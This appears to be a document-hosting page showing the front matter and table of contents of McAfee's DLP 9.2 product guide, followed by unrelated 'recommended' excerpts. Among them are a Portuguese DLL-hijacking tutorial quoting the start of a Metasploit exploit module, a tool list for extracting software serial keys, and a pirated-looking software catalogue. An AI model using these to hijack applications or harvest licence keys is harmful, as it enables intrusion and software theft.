Mcafee Total Protection for Data Loss Prevention 9.2 Software Product Guide Contents

Total Page:16

File Type:pdf, Size:1020Kb

Mcafee Total Protection for Data Loss Prevention 9.2 Software Product Guide Contents Product Guide Revision A McAfee Total Protection for Data Loss Prevention 9.2 Software COPYRIGHT Copyright © 2011 McAfee, Inc. All Rights Reserved. No part of this publication may be reproduced, transmitted, transcribed, stored in a retrieval system, or translated into any language in any form or by any means without the written permission of McAfee, Inc., or its suppliers or affiliate companies. TRADEMARK ATTRIBUTIONS AVERT, EPO, EPOLICY ORCHESTRATOR, FOUNDSTONE, GROUPSHIELD, INTRUSHIELD, LINUXSHIELD, MAX (MCAFEE SECURITYALLIANCE EXCHANGE), MCAFEE, NETSHIELD, PORTALSHIELD, PREVENTSYS, SECURITYALLIANCE, SITEADVISOR, TOTAL PROTECTION, VIRUSSCAN, WEBSHIELD are registered trademarks or trademarks of McAfee, Inc. and/or its affiliates in the US and/or other countries. McAfee Red in connection with security is distinctive of McAfee brand products. All other registered and unregistered trademarks herein are the sole property of their respective owners. LICENSE INFORMATION License Agreement NOTICE TO ALL USERS: CAREFULLY READ THE APPROPRIATE LEGAL AGREEMENT CORRESPONDING TO THE LICENSE YOU PURCHASED, WHICH SETS FORTH THE GENERAL TERMS AND CONDITIONS FOR THE USE OF THE LICENSED SOFTWARE. IF YOU DO NOT KNOW WHICH TYPE OF LICENSE YOU HAVE ACQUIRED, PLEASE CONSULT THE SALES AND OTHER RELATED LICENSE GRANT OR PURCHASE ORDER DOCUMENTS THAT ACCOMPANY YOUR SOFTWARE PACKAGING OR THAT YOU HAVE RECEIVED SEPARATELY AS PART OF THE PURCHASE (AS A BOOKLET, A FILE ON THE PRODUCT CD, OR A FILE AVAILABLE ON THE WEBSITE FROM WHICH YOU DOWNLOADED THE SOFTWARE PACKAGE). IF YOU DO NOT AGREE TO ALL OF THE TERMS SET FORTH IN THE AGREEMENT, DO NOT INSTALL THE SOFTWARE. IF APPLICABLE, YOU MAY RETURN THE PRODUCT TO MCAFEE OR THE PLACE OF PURCHASE FOR A FULL REFUND. 2 McAfee Total Protection for Data Loss Prevention 9.2 Software Product Guide Contents Preface 13 About this guide ..................................13 Audience ..................................13 Conventions .................................13 About this guide ...............................14 Finding product documentation ............................14 1 Introducing McAfee Total Protection for Data Loss Prevention 15 How McAfee DLP works ...............................16 McAfee DLP products ................................17 McAfee DLP Endpoint integration ...........................17 Hardware and operating system improvements ......................18 Discover features .................................18 Internationalization features .............................19 Usability improvements ...............................19 System improvements ................................19 Capture engine enhancements ............................20 Browser support ..................................20 McAfee DLP data types ............................... 20 2 Home 23 How the Home page is configured ...........................23 How the Home page is used .............................23 Customize the Home page ..............................23 Check Home page permissions ............................24 3 Using the Incidents dashboard 25 How incidents are sorted ...............................25 Find policy violations .............................26 Find violations by attribute ...........................26 Delete incidents ...............................26 Delete similar incidents ............................26 How incidents are filtered ..............................26 Filter incidents ................................27 Group incidents ...............................27 Set a time filter for incidents ..........................27 Clear filters .................................28 How to work with incident details ...........................28 Get incident details ..............................29 Find concept matches .............................30 Find match strings ..............................30 Get history of incidents ............................30 Find case status of incidents ..........................30 Assign incidents to cases ........................... 31 Add attributes to incidents ...........................31 McAfee Total Protection for Data Loss Prevention 9.2 Software Product Guide 3 Contents Tune rules ................................. 32 Get related incidents .............................33 How views are set up ................................33 Save views .................................33 Select pre-configured views .......................... 34 Select view vectors ..............................34 Select graphical views .............................34 Copy views to users ............................. 34 Delete views ................................ 35 How reports are generated ..............................35 Create PDF reports ..............................35 Create HTML reports .............................36 Create CSV reports ..............................36 Schedule reports ...............................36 Add report titles ...............................37 How dashboards are customized ........................... 37 Expand dashboard display ...........................37 Add rows to the dashboard ...........................37 Configure dashboard columns ..........................38 Add a match string column ...........................38 How dashboard settings work .............................38 Encrypt incidents ...............................39 Configure throttling to limit incidents reported ...................39 4 Search 41 How data is captured and processed ..........................41 How the capture engine works ............................42 How capture works .................................43 Get search details .................................43 Stop searches ...................................43 Set search parameters ............................... 44 Set up search notification ..............................44 Search by attribute ................................ 45 Finding email ................................45 Finding files ................................ 49 Finding keywords ...............................53 Find chat sessions ..............................55 Find geographic users and incidents .......................55 Find IP addresses .............................. 56 Find a range of IP addresses ..........................56 Find IP addresses on subnets ..........................56 Exclude IP addresses .............................56 Find source code ...............................57 Find websites ................................57 Rules used by the capture engine ...........................57 Distributed searching .............................58 Large-scale searches .............................58 Number of results supported ..........................58 Time-stamping files ..............................58 Archive handling ...............................58 Case insensitivity ...............................59 Microsoft Office 2007 anomalies .........................59 Negative searches ..............................59 Proper name treatment ............................59 Parts of speech excluded from capture ......................59 Special character exceptions ..........................60 4 McAfee Total Protection for Data Loss Prevention 9.2 Software Product Guide Contents Word stemming ...............................60 Languages supported by search engine ..................... 60 Use logical operators in queries ............................61 Logical operators supported in queries ......................61 Tips for searching ................................. 62 Search by excluding content concepts ......................63 Search by excluding ports ...........................64 Search by excluding protocols ......................... 64 Search by file creation time .......................... 64 Search by file last modification time .......................65 Search by global time .............................65 Search by local time globally ..........................66 Search by port ................................66 Search by port range .............................67 Search by protocol ..............................67 Search in a relative time frame .........................68 Search using content concepts .........................68 Use concept expressions ............................68 5 Policies 71 International policies ................................72 How policy inheritance works ............................ 72 How policy activation works .............................72 Activate policies ...............................73 Deactivate policies ..............................73 Work with policies .................................73 Add policies .................................74 Policy fields .................................74 Rename policies ...............................75 Clone policies ................................75 Change ownership of policies ..........................75 Change states of policies ........................... 76 Modify policies ................................76 Execute policies ...............................76 Delete policies ................................77 Publish policies ............................... 77 Rules ...................................... 77 View rule parameters .............................77 Add rules ..................................78 Disable rule inheritance ............................78 Copy rules to policies .............................79 Modify rules .................................79 Delete rules .................................79 Reconfigure rules for web traffic .........................80 Exceptions
Recommended publications
  • Imagen Y Diseño # Nombre 1 10 Christmas Templates 2 10 DVD
    Imagen Y Diseño # Nombre 1 10 Christmas Templates 2 10 DVD Photoshop PSD layer 3 10 Frames for Photoshop 4 1000 famous Vector Cartoons 5 114 fuentes de estilo Rock and Roll 6 12 DVD Plantillas Profesionales PSD 7 12 psd TEMPLATE 8 123 Flash Menu 9 140 graffiti font 10 150_Dreamweaver_Templates 11 1600 Vector Clip Arts 12 178 Companies Fonts, The Best Collection Of Fonts 13 1800 Adobe Photoshop Plugins 14 2.900 Avatars 15 20/20 Kitchen Design 16 20000$ Worth Of Adobe Fonts! with Adobe Type Manager Deluxe 17 21000 User Bars - Great Collection 18 240+ Gold Plug-Ins for Adobe Dreamweaver CS4 19 30 PSD layered for design.Vol1 20 300.000 Animation Gif 21 32.200 Avatars - MEGA COLLECTION 22 330 templates for Power Point 23 3900 logos de marcas famosas en vectores 24 3D Apartment: Condo Designer v3.0 25 3D Box Maker Pro 2.1 26 3D Button Creator Gold 3.03 27 3D Home Design 28 3D Me Now Professional 1.5.1.1 -Crea cabezas en 3D 29 3D PaintBrush 30 3D Photo Builder Professional 2.3 31 3D Shadow plug-in for Adobe Photoshop 32 400 Flash Web Animations 33 400+ professional template designs for Microsoft Office 34 4000 Professional Interactive Flash Animations 35 44 Cool Animated Cards 36 46 Great Plugins For Adobe After Effects 37 50 BEST fonts 38 5000 Templates PHP-SWISH-DHTM-HTML Pack 39 58 Photoshop Commercial Actions 40 59 Unofficial Firefox Logos 41 6000 Gradientes para Photoshop 42 70 POSTERS Alta Calidad de IMAGEN 43 70 Themes para XP autoinstalables 44 73 Custom Vector Logos 45 80 Golden Styles 46 82.000 Logos Brands Of The World 47 90 Obras
    [Show full text]
  • LPS-Public Quick Start Guide
    LPS-Public Quick Start Guide This guide is for the beginner user to create and use a Lightweight Portable Security – Public Edition (LPS- Public) CD to more securely browse the Internet and access CAC-enabled websites. For more information on LPS-Public, see http://www.spi.dod.mil/lipose.htm. LPS-Public focuses on safe browsing; it supports thumb drives but intentionally lacks drivers (support) for hard drives and printers. 1. Create a bootable CD from the ISO image (*.iso, an image file of an optical disc). a) Download and save the LPS-Public ISO image from http://www.spi.dod.mil/lipose.htm. b) Burn the image to a blank CD using ISO software (e.g., UltraISO, ISO Maker, K3b, CDBurnerXP, Easy CD Creator, ImgBurn, CDBurn, Nero Burning ROM, Roxio Creator, or one of many others but ATSPI endorses none). This is not the same as just saving the file to a CD. c) Write the LPS version number on the CD. 2. Connect your PC or Intel-based Mac to a wired Ethernet network with DHCP service, or have a wireless (WiFi) or broadband cellular network available. 3. Connect a USB CCID-compliant CAC reader to your PC. Many built-in readers are not supported. Insert your CAC into the reader. If you have an old or non-CCID reader, you may need new firmware from the OEM. LPS contains a Firmware Updating utility that you should run. 4. Insert the LPS-Public CD into the CD drive. Restart your computer. It may take a few minutes to boot LPS.
    [Show full text]
  • Work Package 2 Collection of Requirements for OS
    Consortium for studying, evaluating, and supporting the introduction of Open Source software and Open Data Standards in the Public Administration Project acronym: COSPA Wor k Package 2 Collection of requirements for OS applications and ODS in the PA and creation of a catalogue of appropriate OS/ODS Solutions D eliverable 2. 1 Catalogue of available Open Source tools for the PA Contract no.: IST-2002-2164 Project funded by the European Community under the “SIXTH FRAMEWORK PROGRAMME” Work Package 2, Deliverable 2.1 - Catalogue of available Open Source tools for the PA Project Acronym COSPA Project full title A Consortium for studying, evaluating, and supporting the introduction of Open Source software and Open Data Standards in the Public Administration Contract number IST-2002-2164 Deliverable 2.1 Due date 28/02/2004 Release date 15/10/2005 Short description WP2 focuses on understanding the OS tools currently used in PAs, and the ODS compatible with these tools. Deliverable D2.1 contains a Catalogue of available open source tools for the PA, including information about the OS currently in use inside PAs, the administrative and training requirements of the tools. Author(s) Free University of Bozen/Bolzano Contributor(s) Conecta, IBM, University of Sheffield Project Officer Tiziana Arcarese Trond Arne Undheim European Commission Directorate-General Information Society Directorate C - Unit C6- eGovernment, BU 31 7/87 rue de la Loi 200 - B-1049 Brussels - Belgium 26/10/04 Version 1.3a page 2/353 Work Package 2, Deliverable 2.1 - Catalogue of available Open Source tools for the PA Disclaimer The views expressed in this document are purely those of the writers and may not, in any circumstances, be interpreted as stating an official position of the European Commission.
    [Show full text]
  • Fedora 20 Grabar Imágenes ISO En Disco Cómo Descargar Imágenes ISO Y Crear CD Y DVD
    Fedora 20 Grabar imágenes ISO en disco Cómo descargar imágenes ISO y crear CD y DVD Fedora Documentation Project Copyright © 2013 Fedora Project Contributors. The text of and illustrations in this document are licensed by Red Hat under a Creative Commons Attribution–Share Alike 3.0 Unported license ("CC-BY-SA"). An explanation of CC-BY-SA is available at http://creativecommons.org/licenses/by-sa/3.0/. The original authors of this document, and Red Hat, designate the Fedora Project as the "Attribution Party" for purposes of CC-BY-SA. In accordance with CC-BY-SA, if you distribute this document or an adaptation of it, you must provide the URL for the original version. Red Hat, as the licensor of this document, waives the right to enforce, and agrees not to assert, Section 4d of CC-BY-SA to the fullest extent permitted by applicable law. Red Hat, Red Hat Enterprise Linux, the Shadowman logo, JBoss, MetaMatrix, Fedora, the Infinity Logo, and RHCE are trademarks of Red Hat, Inc., registered in the United States and other countries. For guidelines on the permitted uses of the Fedora trademarks, refer to https:// fedoraproject.org/wiki/Legal:Trademark_guidelines. Linux® is the registered trademark of Linus Torvalds in the United States and other countries. Java® is a registered trademark of Oracle and/or its affiliates. XFS® is a trademark of Silicon Graphics International Corp. or its subsidiaries in the United States and/or other countries. MySQL® is a registered trademark of MySQL AB in the United States, the European Union and other countries.
    [Show full text]
  • DLL Hijacking with Metasploit
    Autor :Ô.._ mar Fontenele a k a f0nt Drk Date :// 06 03 2011 DLL Hijacking with Metasploit É o seguinte, a técnica consiste em explorar a DLL vulneravel de algum programa e a exploitar . Primeiro vamos ao nosso Metasploit : user@root ~# msfconsole Agora vamos criar uma DLL maliciosa similar a original da Aplicação . usando este exploit : ## # $Id: webdav_dll_hijacker.rb 10101 2010-08-23 13:41:59Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'WebDAV Application DLL Hijacker', 'Description' => %q{ This module presents a directory of file extensions that can lead to code execution when opened from the share. The default EXTENSIONS option must be configured to specify a vulnerable application type. }, 'Author' => [ 'hdm', # Module itself 'jduck', # WebDAV implementation 'jcran', # Exploit vectors ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 10101 $', 'References' => [ ['URL', 'http://blog.zoller.lu/2010/08/cve-2010-xn- loadlibrarygetprocaddress.html'], ['URL', 'http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1- PUB.txt'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process',
    [Show full text]
  • Product Guide Revision A
    Product Guide Revision A McAfee Data Loss Prevention 9.3.1 For use with ePolicy Orchestrator 4.5, 4.6, 5.0 Software COPYRIGHT Copyright © 2014 McAfee, Inc. Do not copy without permission. TRADEMARK ATTRIBUTIONS McAfee, the McAfee logo, McAfee Active Protection, McAfee DeepSAFE, ePolicy Orchestrator, McAfee ePO, McAfee EMM, Foundscore, Foundstone, Policy Lab, McAfee QuickClean, Safe Eyes, McAfee SECURE, SecureOS, McAfee Shredder, SiteAdvisor, McAfee Stinger, McAfee Total Protection, TrustedSource, VirusScan, WaveSecure are trademarks or registered trademarks of McAfee, Inc. or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Product and feature names and descriptions are subject to change without notice. Please visit mcafee.com for the most current products and features. LICENSE INFORMATION License Agreement NOTICE TO ALL USERS: CAREFULLY READ THE APPROPRIATE LEGAL AGREEMENT CORRESPONDING TO THE LICENSE YOU PURCHASED, WHICH SETS FORTH THE GENERAL TERMS AND CONDITIONS FOR THE USE OF THE LICENSED SOFTWARE. IF YOU DO NOT KNOW WHICH TYPE OF LICENSE YOU HAVE ACQUIRED, PLEASE CONSULT THE SALES AND OTHER RELATED LICENSE GRANT OR PURCHASE ORDER DOCUMENTS THAT ACCOMPANY YOUR SOFTWARE PACKAGING OR THAT YOU HAVE RECEIVED SEPARATELY AS PART OF THE PURCHASE (AS A BOOKLET, A FILE ON THE PRODUCT CD, OR A FILE AVAILABLE ON THE WEBSITE FROM WHICH YOU DOWNLOADED THE SOFTWARE PACKAGE). IF YOU DO NOT AGREE TO ALL OF THE TERMS SET FORTH IN THE AGREEMENT, DO NOT INSTALL THE SOFTWARE. IF APPLICABLE, YOU MAY RETURN THE PRODUCT TO MCAFEE OR THE PLACE OF PURCHASE FOR A FULL REFUND.
    [Show full text]
  • Guia De Introdução Ao Roxio Easy CD and DVD Burning 5 Easy CD and DVD Burning.Book Page 6 Wednesday, November 28, 2012 2:31 PM
    Easy_CD_and_DVD_Burning.book Page i Wednesday, November 28, 2012 2:31 PM Roxio Easy CD and DVD Burning Guia de Introdução Easy_CD_and_DVD_Burning.book Page ii Wednesday, November 28, 2012 2:31 PM Sobre a Corel A Corel é uma das maiores empresas de software do mundo e fornece algumas das marcas mais conhecidas do setor, entre elas Roxio®, Pinnacle™ e WinZip®. Ostentando o mais abrangente portfólio de produtos gráficos, de produtividade e de mídia digital, construímos uma reputação por oferecermos software inovador que é fácil de aprender e de usar, ajudando as pessoas a atingir novos níveis de criatividade e produtividade. O setor respondeu com centenas de prêmios de inovação, design e valor. Usadas por milhões de pessoas ao redor do mundo, nossas linhas de produtos incluem CorelDRAW® Graphics Suite, Corel® Painter™, Corel® PaintShop® Pro, Corel® VideoStudio®, Corel® WordPerfect® Office, Pinnacle Studio™, Roxio Creator®, Roxio® Toast® e WinZip®. Para obter mais informações sobre a Corel, visite o site www.corel.com. © 2012 Corel Corporation. Todos os direitos reservados. Corel e outras marcas e logotipos da Corel usados no presente documento são marcas comerciais de propriedade da Corel Corporation e/ou de suas subsidiárias. Este produto e seu guia incluem propriedade intelectual (inclusive marcas comerciais) de propriedade dos respectivos terceiros e/ou por eles registradas e/ou licenciadas. ii Roxio Easy CD and DVD Burning Easy_CD_and_DVD_Burning.book Page 3 Wednesday, November 28, 2012 2:31 PM Sumário Neste guia Bem-vindo ao Roxio Easy CD and DVD Burning. 4 Requisitos do sistema . 5 Instalando o software . 6 Sobre o Easy CD and DVD Burning .
    [Show full text]
  • Make the Switch: Novell's Guide to the Novell® Linux® Desktop
    Make the Switch: Novell's Guide to the Novell® Linux® Desktop Novell Training Services www.novell.com COURSE 3056 AUTHORIZED COURSEWARE 106-001301-001 Make the Switch Novell Linux Desktop (c) 2004 Novell Inc. Proprietary Statement Copyright 2004 Novell, Inc. All rights reserved. No part of this publication may be reproduced, photocopied, stored on a retrieval system, or transmitted without the express prior consent of the publisher. This manual, and any portion thereof, may not be copied without the express written permission of Novell, Inc. Novell, Inc. 1800 South Novell Place Provo, UT 84606 Disclaimer Novell, Inc. makes no representations or warranties with respect to the contents or use of this manual, and specifically disclaims any express or implied warranties of merchantability or fitness for any particular purpose. Further, Novell, Inc. reserves the right to revise this publication and to make changes in its content at any time, without obligation to notify any person or entity of such revisions or changes. Further, Novell, Inc. makes no representations or warranties with respect to any of its software, and specifically disclaims any express or implied warranties of merchantability or fitness for any particular purpose. Further, Novell, Inc. reserves the right to make changes to any and all parts of its software at any time, without obligation to notify any person or entity of such changes. This Novell Training Manual is published solely to instruct students in the use of Novell networking software. Although third-party application software packages are used in Novell training courses, this is for demonstration purposes only and shall not constitute an endorsement of any of these software applications.
    [Show full text]
  • ISO Images Naar Schijf Branden Hoe Download Je ISO Images En Maak Je CD En DVD Media
    Fedora 13 ISO images naar schijf branden Hoe download je ISO images en maak je CD en DVD media Fedora Documentation Project Copyright © 2010 Red Hat, Inc. and others. The text of and illustrations in this document are licensed by Red Hat under a Creative Commons Attribution–Share Alike 3.0 Unported license ("CC-BY-SA"). An explanation of CC-BY-SA is available at http://creativecommons.org/licenses/by-sa/3.0/. The original authors of this document, and Red Hat, designate the Fedora Project as the "Attribution Party" for purposes of CC-BY-SA. In accordance with CC-BY-SA, if you distribute this document or an adaptation of it, you must provide the URL for the original version. Red Hat, as the licensor of this document, waives the right to enforce, and agrees not to assert, Section 4d of CC-BY-SA to the fullest extent permitted by applicable law. Red Hat, Red Hat Enterprise Linux, the Shadowman logo, JBoss, MetaMatrix, Fedora, the Infinity Logo, and RHCE are trademarks of Red Hat, Inc., registered in the United States and other countries. For guidelines on the permitted uses of the Fedora trademarks, refer to https:// fedoraproject.org/wiki/Legal:Trademark_guidelines. Linux® is the registered trademark of Linus Torvalds in the United States and other countries. All other trademarks are the property of their respective owners. Samenvatting Hoe download je ISO images en maak je CD en DVD media 1. Inleiding .................................................................................................................................. 2 2. Downloaden ............................................................................................................................ 2 2.1. CD of DVD kiezen ....................................................................................................... 2 2.2. De ISO-bestanden kiezen ............................................................................................. 3 3.
    [Show full text]
  • Roxio Dvd Burning Software Free Download
    Roxio dvd burning software free download Roxio Easy Media Creator is a disc burner software designed by Roxio. This new version of Free Easy CD DVD Burner, always edited by. Roxio Easy Media Creator is a disc burner software designed by Burning discs: Roxio Easy Media Creator is mainly designed to burn CD, HD- DVD, Roxio Easy Media Creator Free download is a trial version (Solved). Get Roxio Easy CD & DVD Burning for only $! Convert analog audio from LPs and cassettes, enhance the sound quality and add effects. Then create auto-mix playlists and burn your music to CD or DVD. Roxio Easy CD & DVD Burning™ is an easy to use software program for sharing and preserving digital media on discs. Buy Download all components; 1 GB of free hard disk space for every 5 minutes of video for video capture; x Roxio Burn can be downloaded from our website for free. out more software, such as Roxio Easy CD and DVD Burning, Roxio Easy VHS. You can download Roxio Easy CD and DVD Burning from our software library for free. This software was originally designed by. The Roxio Burn software is a complimentary application put on some it's a free program that will allow you to burn CD/DVD's which can be. Preserve your photos - Use photo enhancement tools including red-eye removal, photo .. Roxio Easy CD & DVD Burning is an invaluable software program for. 8/10 (74 votes) - Download Roxio Creator Free. Roxio Creator is one of the best programs to author optical discs. Burn your movie onto a Blu-ray or DVD.
    [Show full text]
  • Microsoft Windows 95/98/ME/2000/XP/2003/Vista/7 32-B
    SoftKey Revealer retrieves Serials and Keys for over 700 software products: Microsoft Windows 95/98/ME/2000/XP/2003/Vista/7 32-bit Microsoft Office XP/2003/2007 Microsoft Internet Explorer 010 Editor 3 3D Screensavers (many) 3Planesoft Screensavers AAA LOGO ABBY FineReader 7, 8 Absolute Time Corrector Acala Products Access Password Recovery Genie ACDSee Products AceMoney Active Desktop Calendar 6,7 Actual Window Manager 4,5,6 Addweb Website Promoter 6,7,8 Adobe Acrobat 5, 6, 7, 8 Adobe Acrobat Distiller 6 Adobe After Effects 6, 6.5, 7 Adobe Illustrator 10,CS,CS2 Adobe Lightroom 1.0 Adobe Photoshop 5, 5.5, 6, 7, CS, CS2 Adobe Photoshop Elements 3, 4 Adobe Premiere 5, 5.5, CS3 Advanced SystemCare Pro 3 AirplanePDQ Alice-soft Products Alien Skin Eye Candy 4, 5 Alcohol 120% All Image All Media Fixer Amabilis 3D Canvas 6 Ashampoo Products Ashampoo Burning Studio ASPack Atlantis Word Processor 1.x Atomic ZIP Password Recovery Audio Recorder Deluxe Autodesk Products -AutoCAD -AutoCAD Electrical -AutoCAD LT -AutoCAD Mechanical -Autodesk Architectural Desktop -Autodesk Building Systems -Autodesk Civil 3D -Autodesk Land Desktop -Autodesk Map 3D -Autodesk Survey -Autodesk Utility Design -Autodesk VIZ Autoplay Menu Builder AutoWorld 3D Garage AVI Toolbox Avira AntiVir PersonalEdition Classic Axailis IconWorkshop Axialis Professional Screen Saver Producer BadCopy BeFaster Belarc Advisor BitComet Acceleration Patch BootXP 2 Borland C++ Builder 6, 7 Borland Delphi 5, 6, 7, 8 CachemanXP Cakewalk SONAR Producer Edition 4,5,6,7,8 CD2HTML CDMenu CDMenuPro
    [Show full text]
  • Burning ISO Images to Disc How to Download ISO Images and Create CD and DVD Media
    Draft Draft Fedora 15.0 Burning ISO images to disc How to download ISO images and create CD and DVD media Fedora Documentation Project Copyright © 2010 Red Hat, Inc. and others. The text of and illustrations in this document are licensed by Red Hat under a Creative Commons Attribution–Share Alike 3.0 Unported license ("CC-BY-SA"). An explanation of CC-BY-SA is available at http://creativecommons.org/licenses/by-sa/3.0/. The original authors of this document, and Red Hat, designate the Fedora Project as the "Attribution Party" for purposes of CC-BY-SA. In accordance with CC-BY-SA, if you distribute this document or an adaptation of it, you must provide the URL for the original version. Red Hat, as the licensor of this document, waives the right to enforce, and agrees not to assert, Section 4d of CC-BY-SA to the fullest extent permitted by applicable law. Red Hat, Red Hat Enterprise Linux, the Shadowman logo, JBoss, MetaMatrix, Fedora, the Infinity Logo, and RHCE are trademarks of Red Hat, Inc., registered in the United States and other countries. For guidelines on the permitted uses of the Fedora trademarks, refer to https:// fedoraproject.org/wiki/Legal:Trademark_guidelines. Linux® is the registered trademark of Linus Torvalds in the United States and other countries. Java® is a registered trademark of Oracle and/or its affiliates. XFS® is a trademark of Silicon Graphics International Corp. or its subsidiaries in the United States and/or other countries. MySQL® is a registered trademark of MySQL AB in the United States, the European Union and other countries.
    [Show full text]